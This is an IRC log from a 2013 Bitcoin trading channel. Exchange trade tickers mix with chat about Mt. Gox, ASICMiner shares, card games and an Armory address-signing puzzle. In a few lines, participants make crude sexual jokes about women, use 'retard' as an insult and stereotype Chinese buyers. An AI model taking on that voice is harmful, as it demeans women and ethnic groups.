Jul 02 23:31:49 [BTCTC] [TAT.ASICMINER] 50 @ 0.0474 = 2.37 BTC [-] Jul 02 23:31:51 [HAVELOCK] [ASICM] 53 @ 0.0459 = 2.4327 BTC [+] Jul 02 23:31:53 [MPEX] [S.MPOE] 1099 @ 0.00083551 = 0.9182 BTC [+] Jul 02 23:35:40 [BTCTC] [S.MPOE-PT] 1 @ 0.001 BTC [+] Jul 02 23:35:53 http://www.forbes.com/sites/timworstall/2013/07/02/further-evidence-that-bitcoins-in-a-bubble/ Jul 02 23:35:56 Further Evidence That Bitcoin's In A Bubble - Forbes Jul 02 23:36:00 ltcglobal gets a mention Jul 02 23:36:10 writer fails to explain his premise Jul 02 23:37:18 i thought you liked marketing. Jul 02 23:37:36 Wow, I read a few posts on the forums for the first time in awhile. retard level is at a alltime high Jul 02 23:37:55 jborkl that's what people say each like 3 months. Jul 02 23:38:26 well, I guess it will be even higher in 3 more months Jul 02 23:38:42 until it implodes under it's own retardation Jul 02 23:39:05 [HAVELOCK] [ASICM] 6 @ 0.04488101 = 0.2693 BTC [-] Jul 02 23:39:06 [HAVELOCK] [ASICM] 994 @ 0.044881 = 44.6117 BTC [-] Jul 02 23:40:48 [BTCTC] [S.BBET-PT] 1 @ 0.00197 BTC [+] Jul 02 23:41:12 i wonder if that can ghappen Jul 02 23:41:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.049198 BTC [+] Jul 02 23:42:11 jborkl: retard level is in a bubble? Jul 02 23:42:14 New game for mg - Critical Mass, you get virtual points in game for shilling and making FUD - multiplayer Jul 02 23:42:42 I am going to go level up Jul 02 23:42:47 lol Jul 02 23:42:50 sounds a little boring tho Jul 02 23:43:19 yeah, it would burn out quick Jul 02 23:43:47 I am a level 30 trollbox Jul 02 23:47:05 [BTCTC] [TAT.ASICMINER] 49 @ 0.047851 = 2.3447 BTC [-] Jul 02 23:47:10 [HAVELOCK] [ASICM] 49 @ 0.0458 = 2.2442 BTC [+] Jul 02 23:49:50 [BTCTC] [ASICMINER-PT] 7 @ 4.752103 = 33.2647 BTC [-] Jul 02 23:49:53 [BTCTC] [ASICMINER-PT] 2 @ 4.7521 = 9.5042 BTC [-] Jul 02 23:49:55 [HAVELOCK] [ASICM] 1 @ 0.0458 BTC [+] Jul 02 23:49:56 [BTCTC] [ASICMINER-PT] 1 @ 4.752004 BTC [-] Jul 02 23:49:57 [HAVELOCK] [ASICM] 253 @ 0.0459 = 11.6127 BTC [+] Jul 02 23:49:58 [HAVELOCK] [ASICM] 994 @ 0.045999 = 45.723 BTC [+] Jul 02 23:49:58 [HAVELOCK] [ASICM] 52 @ 0.046 = 2.392 BTC [+] Jul 02 23:50:00 [BTCTC] [ASICMINER-PT] 1 @ 4.752 BTC [-] Jul 02 23:50:01 [BTCTC] [ASICMINER-PT] 1 @ 4.751 BTC [-] Jul 02 23:50:02 [BTCTC] [ASICMINER-PT] 1 @ 4.75 BTC [-] Jul 02 23:51:13 [HAVELOCK] [ASICM] 48 @ 0.046 = 2.208 BTC [+] Jul 02 23:51:27 smickles up in hurr Jul 02 23:54:35 [BTCTC] [AMC-PT] 200 @ 0.00181 = 0.362 BTC [+] Jul 02 23:57:07 Have there been *any* confirmed fiat withdrawals from Gox in the last week? Jul 02 23:57:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.0488 BTC [+] Jul 02 23:58:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0471 BTC [-] Jul 02 23:58:51 gabbynot not afaik. prolly longer than that. Jul 02 23:59:15 [BTCTC] [TAT.ASICMINER] 63 @ 0.047001 = 2.9611 BTC [-] Jul 03 00:00:33 Thx…interesting soap opera. Jul 03 00:06:57 [BTCTC] [ASICMINER-PT] 1 @ 4.8 BTC [+] Jul 03 00:07:31 [BTCTC] [ASICMINER-PT] 1 @ 4.8 BTC [+] Jul 03 00:08:07 [HAVELOCK] [ASICM] 48 @ 0.04699899 = 2.256 BTC [+] Jul 03 00:08:11 [HAVELOCK] [ASICM] 27 @ 0.04699999 = 1.269 BTC [+] Jul 03 00:09:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.048899 BTC [+] Jul 03 00:10:38 [BTCTC] [AMC-PT] 4 @ 0.002 = 0.008 BTC [+] Jul 03 00:14:20 [BTCTC] [BASIC-MINING] 8 @ 0.166 = 1.328 BTC [-] Jul 03 00:14:37 [BTCTC] [CRYPTO-TRADE] 6 @ 0.198 = 1.188 BTC [-] Jul 03 00:15:32 [BTCTC] [BASIC-MINING] 42 @ 0.166 = 6.972 BTC [-] Jul 03 00:16:58 [BTCTC] [TAT.ASICMINER] 10 @ 0.0488 = 0.488 BTC [-] Jul 03 00:19:10 [BTCTC] [BASIC-MINING] 8 @ 0.1657 = 1.3256 BTC [-] Jul 03 00:22:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.048501 BTC [-] Jul 03 00:22:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.047751 BTC [-] Jul 03 00:22:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.047002 BTC [-] Jul 03 00:22:55 [BTCTC] [TAT.ASICMINER] 15 @ 0.047 = 0.705 BTC [-] Jul 03 00:22:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.0465 = 0.1395 BTC [-] Jul 03 00:22:58 [BTCTC] [TAT.ASICMINER] 50 @ 0.0461 = 2.305 BTC [-] Jul 03 00:23:00 [BTCTC] [TAT.ASICMINER] 20 @ 0.046 = 0.92 BTC [-] Jul 03 00:23:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.046 = 0.23 BTC [-] Jul 03 00:23:03 [BTCTC] [TAT.ASICMINER] 14 @ 0.0457 = 0.6398 BTC [-] Jul 03 00:26:49 [BTCTC] [ASICMINER-PT] 1 @ 4.838972 BTC [+] Jul 03 00:27:11 [BTCTC] [TAT.ASICMINER] 10 @ 0.0486 = 0.486 BTC [+] Jul 03 00:33:00 [HAVELOCK] [ASICM] 1 @ 0.04699997 BTC [-] Jul 03 00:33:45 5 dorrah sucky sucky Jul 03 00:34:08 s/dorrh/btc Jul 03 00:34:27 tits or gtfo Jul 03 00:34:41 ;) Jul 03 00:38:17 [BTCTC] [ASICMINER-PT] 7 @ 4.83896 = 33.8727 BTC [-] Jul 03 00:38:45 [BTCTC] [ASICMINER-PT] 2 @ 4.839 = 9.678 BTC [+] Jul 03 00:38:51 [BTCTC] [DMS.PURCHASE] 15 @ 0.049338 = 0.7401 BTC [+] Jul 03 00:40:04 [BTCTC] [AMC-PT] 2 @ 0.002 = 0.004 BTC [+] Jul 03 00:41:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.048599 = 0.0972 BTC [-] Jul 03 00:42:32 what up Jul 03 00:42:41 kakobrekla: you around? Jul 03 00:42:47 mh Jul 03 00:42:47 m Jul 03 00:42:57 check out buttonwood_advanced.meteor.com Jul 03 00:44:36 o, bootstrap Jul 03 00:45:10 :) Jul 03 00:51:25 [HAVELOCK] [ASICM] 3 @ 0.04699998 = 0.141 BTC [+] Jul 03 00:51:50 [HAVELOCK] [ASICM] 177 @ 0.04699998 = 8.319 BTC [+] Jul 03 00:53:44 [BTCTC] [ASICMINER-PT] 2 @ 4.869 = 9.738 BTC [+] Jul 03 00:54:20 [BTCTC] [ASICMINER-PT] 1 @ 4.869 BTC [+] Jul 03 00:55:18 [BTCTC] [TAT.ASICMINER] 50 @ 0.0471 = 2.355 BTC [-] Jul 03 00:56:17 [BTCTC] [TAT.ASICMINER] 25 @ 0.048599 = 1.215 BTC [+] Jul 03 00:56:46 [BTCTC] [TAT.ASICMINER] 20 @ 0.046599 = 0.932 BTC [-] Jul 03 00:57:04 i think mjr ruined the exchange rate Jul 03 00:57:06 YOU BROKE BTC Jul 03 00:57:50 hehe Jul 03 00:57:57 stahp IRL trading! Jul 03 00:59:20 http://24.media.tumblr.com/tumblr_m8fbwm8h221qbklpto1_500.jpg unrelated. Jul 03 00:59:43 [BTCTC] [TAT.ASICMINER] 13 @ 0.048599 = 0.6318 BTC [+] Jul 03 01:02:51 Connection Problems Jul 03 01:02:51 Sorry, SMF was unable to connect to the database. Jul 03 01:02:58 no forum, no drama. no drama, no bitcoins. Jul 03 01:03:00 prepare to die. Jul 03 01:03:11 i. feel. weaker. Jul 03 01:03:18 must. have. drama. Jul 03 01:03:48 Oh the panic!!! Jul 03 01:03:49 http://www.youtube.com/watch?v=gYHrseZrUvY Jul 03 01:03:50 Nirvana-The End - YouTube Jul 03 01:04:25 Gox is still up Jul 03 01:05:05 we're talking btc not magic the gathering here. wrong chan Jul 03 01:05:41 oh, damnit where to sell my trading cards at Jul 03 01:05:50 we should all use MTGO chat to hide from NSA Jul 03 01:05:53 you mean trade your sell cards ? Jul 03 01:06:40 I don't know really what trading cards are :( Jul 03 01:06:52 too old or not cool enough Jul 03 01:06:56 lol moment of shjame Jul 03 01:07:06 honestly, i think they're fantasy themed baseball cards. Jul 03 01:07:32 like a rookie Ogre card? Jul 03 01:07:36 i used to play MTGO a fair bit Jul 03 01:07:48 the game is actually pretty well-designed Jul 03 01:08:07 did you win ? Jul 03 01:08:13 i did pretty well Jul 03 01:08:25 do you take other people's cards through some card-defined process ? Jul 03 01:08:32 Well, If I come across any cards I will make sure to sell them to you Jul 03 01:08:51 I wonder if Gox has a API for Ogre cards Jul 03 01:08:59 or nvidia. Jul 03 01:09:09 when i was a kid i used to play people on the terms that whomever won would get to pick a card at random from the opponents deck and keep it Jul 03 01:09:24 many loved the gamble Jul 03 01:09:27 [BTCTC] [CRYPTO-TRADE] 5 @ 0.198 = 0.99 BTC [-] Jul 03 01:09:29 and lost many cards to me Jul 03 01:09:43 does having an infinity of cards help anything ? Jul 03 01:09:51 well there are many cards Jul 03 01:09:58 and they hav esale value Jul 03 01:09:59 but limited deck sizes Jul 03 01:10:01 a so you sorta float up the quality of your deck Jul 03 01:10:23 these days you have to pay out for the best cards the day they are released Jul 03 01:10:27 if you really wanna compete Jul 03 01:10:45 back then it was less competitive Jul 03 01:10:59 but on MTGO i didnt play "constructed" decks Jul 03 01:11:07 i played limited drafts Jul 03 01:11:09 [BTCTC] [CRYPTO-TRADE] 5 @ 0.198 = 0.99 BTC [-] Jul 03 01:11:14 well this is bs. buy the license to win from the company or lose Jul 03 01:11:17 why even play then Jul 03 01:11:22 basically you open a back, pick a card, and pass it to the left Jul 03 01:11:26 (the pack) Jul 03 01:11:31 pack* Jul 03 01:11:42 [BTCTC] [ASICMINER-PT] 1 @ 4.866999 BTC [-] Jul 03 01:11:44 [BTCTC] [ASICMINER-PT] 1 @ 4.867 BTC [+] Jul 03 01:11:46 [BTCTC] [ASICMINER-PT] 1 @ 4.869 BTC [+] Jul 03 01:11:48 [BTCTC] [ASICMINER-PT] 3 @ 4.87 = 14.61 BTC [+] Jul 03 01:11:50 [BTCTC] [ASICMINER-PT] 1 @ 4.879 BTC [+] Jul 03 01:12:02 this required designing a deck on the fly and making choices dynamically to what you were fed from the right Jul 03 01:12:21 all of this with a time limit of course Jul 03 01:12:36 by far my preferred way of playing Jul 03 01:13:12 [BTCTC] [TAT.ASICMINER] 10 @ 0.048594 = 0.4859 BTC [-] Jul 03 01:13:35 there are 3 rounds of pack openings, each time changing the direction they are passed Jul 03 01:13:47 each pack having 15 cards Jul 03 01:14:21 [BTCTC] [AMC-PT] 5 @ 0.002 = 0.01 BTC [+] Jul 03 01:15:48 [BTCTC] [ASICMINER-PT] 1 @ 4.8 BTC [-] Jul 03 01:20:51 [BTCTC] [AMC-PT] 100 @ 0.00201 = 0.201 BTC [+] Jul 03 01:21:32 [BTCTC] [TAT.ASICMINER] 50 @ 0.048499 = 2.425 BTC [-] Jul 03 01:21:40 [HAVELOCK] [ASICM] 5 @ 0.04699999 = 0.235 BTC [+] Jul 03 01:22:46 [BTCTC] [ASICMINER-PT] 1 @ 4.800001 BTC [+] Jul 03 01:23:14 [BTCTC] [ASICMINER-PT] 1 @ 4.878999 BTC [+] Jul 03 01:23:26 [HAVELOCK] [ASICM] 7 @ 0.04699999 = 0.329 BTC [+] Jul 03 01:23:28 [HAVELOCK] [ASICM] 200 @ 0.047 = 9.4 BTC [+] Jul 03 01:23:42 [BTCTC] [ASICMINER-PT] 2 @ 4.800002 = 9.6 BTC [-] Jul 03 01:24:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.0485 BTC [+] Jul 03 01:26:23 [BTCTC] [ASICMINER-PT] 1 @ 4.83 BTC [+] Jul 03 01:27:01 [BTCTC] [CRYPTO-TRADE] 1 @ 0.197 BTC [-] Jul 03 01:27:03 [BTCTC] [CRYPTO-TRADE] 15 @ 0.197 = 2.955 BTC [-] Jul 03 01:27:04 [BTCTC] [CRYPTO-TRADE] 4 @ 0.197 = 0.788 BTC [-] Jul 03 01:27:15 [BTCTC] [AMC-PT] 37 @ 0.002 = 0.074 BTC [-] Jul 03 01:31:39 [MPEX] [S.MPOE] 2033 @ 0.00083397 = 1.6955 BTC [-] Jul 03 01:31:40 [MPEX] [S.MPOE] 667 @ 0.0008289 = 0.5529 BTC [-] Jul 03 01:33:46 looks like AM just about sold out of the first batch of USBminers https://bitcointalk.org/index.php?topic=49417.msg2638648#msg2638648 Jul 03 01:33:54 thanks to BTCguild in no small part Jul 03 01:34:54 they should really make something more useful Jul 03 01:35:06 asics are useful Jul 03 01:35:28 toy asics, not so much Jul 03 01:35:50 why not ? Jul 03 01:36:08 any cryptogear that fits comfortably in the untrained girl's rectum is a great gain. Jul 03 01:36:29 there is that Jul 03 01:36:47 you should post picks of your rectum mining farm Jul 03 01:37:23 they should call the next ones Spelunkers Jul 03 01:37:24 actually that might not be a bad idea. a bunch of shaved pubises with utp cables coming out from behind Jul 03 01:37:34 art of the modern generation. Jul 03 01:38:04 whats with btcguild and all these usb asic?? Jul 03 01:38:27 [BTCTC] [S.MPOE-PT] 10 @ 0.001 = 0.01 BTC [+] Jul 03 01:38:28 seems AM underestimats having a remotely usable ecommerce solution Jul 03 01:39:07 BLF underestimates having a working product tho Jul 03 01:39:09 reliably so. Jul 03 01:39:15 both of them. Jul 03 01:39:17 BFL* Jul 03 01:39:34 but yes, actually having a product beats distribution ineptitude Jul 03 01:39:36 of look mircea_popescu someone likes you http://i.imgur.com/5JPr7n5.png Jul 03 01:39:58 having a presence outside of an anonymous account on the asshole of the internet makes it harder to cut and run Jul 03 01:40:00 (tho given their impossible distribution incompetence i have no idea why the forum balks at the girl's stating the friedcat guy has no financial sense at all) Jul 03 01:40:22 AM clearly saw BFLs mistake Jul 03 01:40:37 [BTCTC] [AMC-PT] 3 @ 0.002 = 0.006 BTC [-] Jul 03 01:40:44 pigeons that's a little crazy. how did political get to oppose science and be represented by cuffs Jul 03 01:41:15 and wtf are loom dollars Jul 03 01:41:18 fight the power Jul 03 01:41:20 omg i am too old for this aren't i ?! Jul 03 01:41:29 probably FR-Tokens on loom.cc Jul 03 01:41:40 mircea cause its 5btc per share Jul 03 01:42:21 basically the guy has some ideas but also is a little confused. for instance why "nyse corp shares" but "nasdaq securities" ? Jul 03 01:42:34 it's the nyse that trades all sorts of securities, like for instance metals Jul 03 01:42:40 and it's the nasdaq that only deals in shares Jul 03 01:43:35 and wait. ripple usd, ripple gold... wtf ?! why the opposition ? nuts. Jul 03 01:44:01 kakobrekla yea, i guess so. except THEY made it 5 lol. Jul 03 01:44:23 anyway, pigeons, you know who made that ? Jul 03 01:44:33 well the underlying reason is not important to average bitcointalker Jul 03 01:45:11 "Truledger is an anonymous, digitally-signed general ledger and trading system. Like Loom, it allows anyone to issue assets. Unlike Loom, which relies entirely ..." Jul 03 01:45:28 i think now we find out just how inept i actually am. i don't know/never seen half the stuff on that graph. Jul 03 01:45:41 me either Jul 03 01:46:00 [BTCTC] [AMC-PT] 2 @ 0.002 = 0.004 BTC [-] Jul 03 01:46:13 sounds like it was made by someone deep into the scammer/MLM/affiliate mktg world Jul 03 01:46:20 lol Jul 03 01:47:12 are you insinuating too deep to be legit ? Jul 03 01:47:44 to me it reads more liek someone deep into the crypto-whatever. ie, govt is bad, anarchy is good, science shall save us by itself, it's a sort of an us alt-mainstream by now Jul 03 01:48:05 [HAVELOCK] [VTX] 1 @ 0.497003 BTC [-] Jul 03 01:48:06 [HAVELOCK] [VTX] 1 @ 0.497002 BTC [-] Jul 03 01:48:08 [HAVELOCK] [VTX] 1 @ 0.497 BTC [-] Jul 03 01:48:53 [BTCTC] [S.BBET-PT] 1 @ 0.00197 BTC [+] Jul 03 01:48:58 Service Temporarily Unavailable Jul 03 01:48:58 The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later. Jul 03 01:49:04 that much for trueledger >< Jul 03 01:50:52 Exchange — Loom does not provide simultaneous exchange services. It only provides one-way transfers. The other half of an exchange must be performed in a separate transaction either within or without Loom. Jul 03 01:50:52 [Editor's note: Actually, the author of Loom has been planning a two-way internal asset exchange mechanism known as a "Vending Machine" for some time. It should be rolled out within a few months, probably by Sep 2009.] Jul 03 01:50:52 [Update 12 Jan 2010: OK, I didn't get it done by Sep 2009. But I have been working on an advanced "Live Object" mechanism for Loom which will support not only Vending Machines but any other type of feature as well.] Jul 03 01:50:58 well this was an entertaining google binge Jul 03 01:51:24 [BTCTC] [ASICMINER-PT] 1 @ 4.830015 BTC [+] Jul 03 01:51:29 "Loom's security is based on three elements, the mathematics of really large numbers, open source software and server operator honesty." Jul 03 01:52:21 server operators are pretty honest Jul 03 01:52:45 ahahahaha Jul 03 01:52:55 anyone familiar with Armory? Jul 03 01:53:03 i'm trying to verify a message from it Jul 03 01:53:04 [BTCTC] [TAT.ASICMINER] 8 @ 0.048443 = 0.3875 BTC [-] Jul 03 01:53:05 dude... you might end up with shit you say here on your grave. Jul 03 01:53:24 [BTCTC] [TAT.ASICMINER] 200 @ 0.048444 = 9.6888 BTC [+] Jul 03 01:53:26 i already have my epitaph written Jul 03 01:53:30 well i have a few Jul 03 01:53:41 o really ? Jul 03 01:53:47 [BTCTC] [TAT.ASICMINER] 9 @ 0.0485 = 0.4365 BTC [+] Jul 03 01:53:50 if Armory spits out this mz77WBQSpvYAiDFu9sCveYmzYQC5ZQpvq2 from a verification Jul 03 01:53:52 wtf is that? Jul 03 01:54:12 ThickAsThieves: Hi Jul 03 01:54:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.0486 = 0.486 BTC [+] Jul 03 01:54:18 ola Jul 03 01:54:24 ThickAsThieves: I use Armory 24/7 Jul 03 01:54:32 PM me for questions. ;p Jul 03 01:54:44 anyone familiar with Armory? // you still manage to run it ? Jul 03 01:55:18 well you have to have gigabytes of ram Jul 03 01:55:23 i just installed it for the first time Jul 03 01:55:33 cuz Jutarul signs his messages with it Jul 03 01:55:46 it's a joke this usability issue hasn't been fixed by now... Jul 03 01:56:19 there is a git branch, but I don't think it's usable yet Jul 03 01:56:57 "The resolution of the usability issues has been slowed by some critical, unrelated events." // here you go for the PR statement, reminds me of an article on polimedia Jul 03 01:57:15 the latest beta seems to work fine Jul 03 01:57:21 mmm free large pizza tokens Jul 03 01:57:25 i just dont understand the address it's spitting out Jul 03 01:57:44 why do people use random shit like this Jul 03 01:58:15 [BTCTC] [ASICMINER-PT] 1 @ 4.879 BTC [+] Jul 03 01:58:17 [BTCTC] [ASICMINER-PT] 2 @ 4.8795 = 9.759 BTC [+] Jul 03 01:58:19 [BTCTC] [ASICMINER-PT] 2 @ 4.889 = 9.778 BTC [+] Jul 03 01:58:28 Stardust which ? Jul 03 01:58:49 ThickAsThieves because they understand it. Jul 03 01:59:13 [HAVELOCK] [ASICM] 100 @ 0.047 = 4.7 BTC [+] Jul 03 01:59:24 [BTCTC] [ASICMINER-PT] 2 @ 4.899 = 9.798 BTC [+] Jul 03 01:59:43 do they understand that most of the people they are dealing with do not understand it? Jul 03 01:59:56 is this their way of imposing their self-righteousness? Jul 03 02:00:05 mircea_popescu, the one you were rightfully bitching on today's consensus about what PR should be like, and why it sucks Jul 03 02:00:20 a Jul 03 02:01:32 [BTCTC] [S.DICE-PT] 57 @ 0.002347 = 0.1338 BTC [+] Jul 03 02:01:34 [BTCTC] [S.DICE-PT] 67 @ 0.002348 = 0.1573 BTC [+] Jul 03 02:01:38 [BTCTC] [S.DICE-PT] 101 @ 0.002349 = 0.2372 BTC [+] Jul 03 02:01:39 ThickAsThieves nope. Jul 03 02:01:59 so loom is developed by taaki? Jul 03 02:02:20 [BTCTC] [S.MPOE-PT] 349 @ 0.000999 = 0.3487 BTC [-] Jul 03 02:02:47 dub i thought loom is like... a few years old Jul 03 02:02:52 [BTCTC] [TAT.ASICMINER] 5 @ 0.048699 = 0.2435 BTC [+] Jul 03 02:03:02 but maff and fings Jul 03 02:03:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.048699 = 0.2435 BTC [+] Jul 03 02:03:39 nevertheless Jul 03 02:03:57 ThickAsThieves: Only noobs don't understand Armory. :P Jul 03 02:04:17 dude this is sad, all the games i like are > 10 years old. Jul 03 02:05:10 [BTCTC] [DMS.MINING] 1 @ 0.0205 BTC [+] Jul 03 02:05:41 [BTCTC] [BMF] 10 @ 0.05 = 0.5 BTC [+] Jul 03 02:07:39 [BTCTC] [ASICMINER-PT] 4 @ 4.897994 = 19.592 BTC [-] Jul 03 02:07:43 mircea, find indie games on Steam or elsewhere. Many are similar to older games. Also, emulators are perfect for playing the old platforms' games. Jul 03 02:08:14 [HAVELOCK] [ASICM] 3 @ 0.04615 = 0.1385 BTC [-] Jul 03 02:08:44 [BTCTC] [ASICMINER-PT] 1 @ 4.898 BTC [+] Jul 03 02:08:46 [BTCTC] [ASICMINER-PT] 6 @ 4.9 = 29.4 BTC [+] Jul 03 02:08:51 [BTCTC] [BTC-BOND] 5 @ 0.009999 = 0.05 BTC [+] Jul 03 02:09:33 [BTCTC] [ASICMINER-PT] 1 @ 4.9 BTC [+] Jul 03 02:09:34 [BTCTC] [ASICMINER-PT] 1 @ 4.948 BTC [+] Jul 03 02:09:36 [BTCTC] [ASICMINER-PT] 1 @ 4.949 BTC [+] Jul 03 02:09:38 [BTCTC] [ASICMINER-PT] 1 @ 4.9529 BTC [+] Jul 03 02:09:44 [BTCTC] [ASICMINER-PT] 1 @ 4.954 BTC [+] Jul 03 02:09:46 [BTCTC] [ASICMINER-PT] 2 @ 4.956 = 9.912 BTC [+] Jul 03 02:09:48 [BTCTC] [ASICMINER-PT] 2 @ 4.959 = 9.918 BTC [+] Jul 03 02:09:56 go go go\ Jul 03 02:10:14 stop right at my ask... Jul 03 02:10:20 [BTCTC] [TAT.ASICMINER] 19 @ 0.048699 = 0.9253 BTC [+] Jul 03 02:10:54 Namworld yeah Jul 03 02:11:59 [BTCTC] [TAT.ASICMINER] 95 @ 0.0487 = 4.6265 BTC [+] Jul 03 02:12:07 [BTCTC] [AMC-PT] 12 @ 0.002 = 0.024 BTC [-] Jul 03 02:14:40 [BTCTC] [AMC-PT] 18 @ 0.002 = 0.036 BTC [-] Jul 03 02:15:00 [BTCTC] [AMC-PT] 72 @ 0.00201 = 0.1447 BTC [+] Jul 03 02:15:10 [HAVELOCK] [ASICM] 3 @ 0.04777597 = 0.1433 BTC [+] Jul 03 02:15:11 [HAVELOCK] [ASICM] 94 @ 0.04777598 = 4.4909 BTC [+] Jul 03 02:15:18 [HAVELOCK] [ASICM] 3 @ 0.04777598 = 0.1433 BTC [+] Jul 03 02:15:25 [HAVELOCK] [ASICM] 300 @ 0.04777699 = 14.3331 BTC [+] Jul 03 02:15:32 [HAVELOCK] [ASICM] 400 @ 0.047777 = 19.1108 BTC [+] Jul 03 02:16:00 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00468 BTC [+] Jul 03 02:16:53 [BTCTC] [ASICMINER-PT] 2 @ 4.959 = 9.918 BTC [+] Jul 03 02:17:08 shit is cray cray Jul 03 02:17:46 Damn... ASICMINER Jul 03 02:17:48 [BTCTC] [AMC-PT] 1 @ 0.00201 BTC [+] Jul 03 02:18:09 so can someone explain this: Jul 03 02:18:10 https://blockchain.info/address/1KbAD8KU1u6uw6nHSJEYpdZfgQbNbTAkH2 Jul 03 02:18:13 Bitcoin Address 1KbAD8KU1u6uw6nHSJEYpdZfgQbNbTAkH2 Jul 03 02:18:18 I was idly wondering if, with their infinte business accumen, AM themseleves were buying them back Jul 03 02:18:21 http://blockchain.info/address/mz77WBQSpvYAiDFu9sCveYmzYQC5ZQpvq2 Jul 03 02:18:23 [BTCTC] [AMC-PT] 318 @ 0.0021 = 0.6678 BTC [+] Jul 03 02:18:25 Bitcoin Address mz77WBQSpvYAiDFu9sCveYmzYQC5ZQpvq2 Jul 03 02:18:27 both thos elinks Jul 03 02:18:30 are the same address Jul 03 02:18:33 wtf? Jul 03 02:19:03 if i do a search for mz77WBQSpvYAiDFu9sCveYmzYQC5ZQpvq2 it errors Jul 03 02:19:21 [HAVELOCK] [ASICM] 13 @ 0.04789998 = 0.6227 BTC [+] Jul 03 02:19:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.048503 BTC [-] Jul 03 02:19:50 their hash160 are the same, hm… Jul 03 02:20:10 yep, the thing is the second doesn't start with 1 Jul 03 02:20:24 not sure it's a valid btc address Jul 03 02:20:43 makes sense. Jul 03 02:20:48 doe sit? Jul 03 02:21:09 bitcoin address mz ?! eh ? Jul 03 02:21:18 dub you mean the shares ? Jul 03 02:21:24 yes Jul 03 02:21:46 dare i ask the feared "but why" ? Jul 03 02:21:52 [BTCTC] [ASICMINER-PT] 1 @ 4.840025 BTC [-] Jul 03 02:22:10 at some point the belief that retards have enough money to drive this demand starts to thin out Jul 03 02:22:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.048503 BTC [-] Jul 03 02:22:19 it doesn't take much. Jul 03 02:22:22 why? because chinese logic Jul 03 02:22:27 [BTCTC] [TAT.ASICMINER] 5 @ 0.048503 = 0.2425 BTC [-] Jul 03 02:22:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.0487 = 0.2435 BTC [+] Jul 03 02:22:33 [BTCTC] [TAT.ASICMINER] 61 @ 0.048898 = 2.9828 BTC [+] Jul 03 02:22:42 then why would AM be promoting it to chinese in presentations? Jul 03 02:22:42 indeed Jul 03 02:22:53 it hink it's just chinese buyers diving in Jul 03 02:22:58 bitcoind validateaddress mz77WBQSpvYAiDFu9sCveYmzYQC5ZQpvq2" Jul 03 02:22:58 { Jul 03 02:22:58 "isvalid" : false Jul 03 02:22:58 } Jul 03 02:23:04 i thought chinese ppl could maff. Jul 03 02:23:09 no Jul 03 02:23:43 with that many people, it doesnt take many to be bad at maff to run up the price Jul 03 02:26:10 [HAVELOCK] [VTX] 1 @ 0.495 BTC [-] Jul 03 02:26:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.04875 BTC [-] Jul 03 02:26:28 [HAVELOCK] [ASICM] 10 @ 0.0478997 = 0.479 BTC [-] Jul 03 02:26:29 [HAVELOCK] [ASICM] 454 @ 0.04789998 = 21.7466 BTC [+] Jul 03 02:27:11 [HAVELOCK] [ASICM] 10 @ 0.04789998 = 0.479 BTC [+] Jul 03 02:28:21 [BTCTC] [TAT.ASICMINER] 9 @ 0.048898 = 0.4401 BTC [+] Jul 03 02:28:41 so with this weird address Jul 03 02:28:51 is that something someone could scam with? Jul 03 02:29:03 not likely Jul 03 02:29:18 somehow signing the mz77WBQSpvYAiDFu9sCveYmzYQC5ZQpvq2 address Jul 03 02:29:23 because equals the other Jul 03 02:29:27 [BTCTC] [TAT.ASICMINER] 39 @ 0.048899 = 1.9071 BTC [+] Jul 03 02:29:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.048899 = 0.0978 BTC [+] Jul 03 02:30:00 signing with what ThickAsThieves ? Jul 03 02:30:28 you have to specify the private-key bound to an address when you talk about signing Jul 03 02:30:51 i love audacity. Jul 03 02:30:52 i'm just trying to do a deal with this guy Jul 03 02:30:54 [BTCTC] [CRYPTO-TRADE] 5 @ 0.199999 = 1 BTC [+] Jul 03 02:30:56 [BTCTC] [CRYPTO-TRADE] 15 @ 0.2 = 3 BTC [+] Jul 03 02:31:07 making sure this is his addy 100% Jul 03 02:31:13 1KbAD8KU1u6uw6nHSJEYpdZfgQbNbTAkH2 Jul 03 02:31:27 but the signing process spits out the other addy Jul 03 02:31:41 always deal with the 1* address Jul 03 02:31:43 [BTCTC] [BASIC-MINING] 3 @ 0.1795 = 0.5385 BTC [+] Jul 03 02:31:50 that way doesnt work Jul 03 02:31:51 wtf Jul 03 02:32:11 isnt m the testnet prefix Jul 03 02:32:25 ll, humm Jul 03 02:32:36 i remember reading something about how people could suss the key of the signed message contains the address within it Jul 03 02:32:45 if it Jul 03 02:32:55 ll, indeed Jul 03 02:33:01 ll yes Jul 03 02:33:06 [HAVELOCK] [ASICM] 3 @ 0.0475001 = 0.1425 BTC [-] Jul 03 02:33:30 ThickAsThieves seems unlikely. Jul 03 02:35:05 http://upload.wikimedia.org/wikipedia/commons/b/bc/Ordeal_of_water.jpg Jul 03 02:35:09 manga, cca 1600 Jul 03 02:42:14 [HAVELOCK] [ASICM] 207 @ 0.0475001 = 9.8325 BTC [-] Jul 03 02:43:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.0489 BTC [+] Jul 03 02:48:29 new honeypot: http://www.forbes.com/sites/andygreenberg/2013/06/26/bitcoin-black-market-competition-heats-up-with-pro-marketing-and-millions-at-stake/ Jul 03 02:50:04 isn't this the old one ? Jul 03 02:53:05 mircea_popescu: apparently old. I just happened to miss it at first. Jul 03 02:53:26 much to your detriment Jul 03 02:53:54 http://allthingsvice.com/2013/04/26/interview-with-a-virtual-drug-tsar/ Jul 03 02:54:03 Interview with a (virtual) drug tsar | All Things VICE Jul 03 02:54:16 gotta love the compromised 'PGP' (in-browser crap) Jul 03 02:54:22 anyway, i wonder who outside of the famished 